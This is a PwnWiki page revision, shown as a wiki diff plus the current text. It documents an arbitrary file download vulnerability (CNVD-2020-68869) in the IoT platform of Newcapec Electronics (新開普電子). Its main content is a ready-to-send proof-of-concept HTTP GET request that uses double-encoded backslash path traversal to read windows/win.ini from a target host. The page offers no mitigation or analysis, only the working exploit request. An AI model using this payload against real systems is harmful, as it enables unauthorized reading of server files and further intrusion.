Difference between revisions of "CNVD-2020-68869 新開普電子股份有限公司 物聯網平台任意文件下載漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <translate> 新開普電子股份有限公司 物聯網平台 </translate> ==POC== <pre> GET /api/device/foreignId//...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
新開普電子股份有限公司 物聯網平台 | 新開普電子股份有限公司 物聯網平台 | ||
</translate> | </translate> | ||
Latest revision as of 21:42, 8 July 2021
漏洞影響
新開普電子股份有限公司 物聯網平台
POC
GET /api/device/foreignId//…%255c…%255c…%255c…%255c…%255c…%255c…%255c…%255cwindows/win.ini HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip,deflate Host: target:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive
